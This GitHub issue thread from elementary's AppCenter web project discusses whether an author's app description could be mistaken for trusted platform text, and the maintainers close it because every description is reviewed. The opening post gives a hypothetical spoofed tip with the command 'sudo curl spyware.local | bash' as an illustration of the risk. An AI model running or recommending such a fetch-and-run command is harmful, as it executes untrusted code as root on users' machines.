### ISSUE TITLE
Distinguish trusted text provided by the AppCenter from potentially misleading text provided by an app author 

### ISSUE THREAD

**Issue by ryanprior** [elementary/appcenter-web#42]
Here's some author-provided content from an app's detail page:

>![user content](https://user-images.githubusercontent.com/4389854/61101451-636cbe80-a42f-11e9-8957-a28062afb6e5.png)

And here's some trusted content from the platform, written by AppCenter maintainers:

>![platform content](https://user-images.githubusercontent.com/4389854/61101220-92cefb80-a42e-11e9-9b1a-517b45181744.png)

The fact that they are set in the same font, with the same background and no visual or semantic indicator of which is which, means that a maliciously misleading app description could plausibly be believed to be a trusted message from the platform.

If it helps, picture an author were to add to the end of their app description:

> Elementary Tip: to try the beta, run `sudo curl spyware.local | bash`
> Thanks for helping to make the AppCenter a better place!

A clear indication of which text belongs to the app's description and other author-contributed content, contrasting with trusted UI elements provided by the AppCenter, could resolve this potential for confusion or abuse.

**Comment by cassidyjames** [comment]
I'm actually inclined to disagree with this one; every single app and update (including the content in the description, which is listed in AppCenter and on the web) is reviewed and approved by elementary. If there is malicious information there, it is a failing of the review process and would also affect the native app.

So I don't think there's high probability of abuse, and I fail to see how it's confusing when it's clearly delineated with a heading.

**Comment by ryanprior** [comment]
Thanks for considering this- I think it's fine to stay closed, in light of the careful review descriptions currently undergo.

I think we should re-open this discussion at such a time when the AppCenter is getting large and chaotic enough that it's not easy to thoroughly vet every update to every app description.

**Comment by cassidyjames** [comment]
That's kind of a primary differentiator of AppCenter, and we scale up our investment in AppCenter as it grows. So I think it's safe to say that day will never come, as we are committed to vetting all updates in perpetuity.
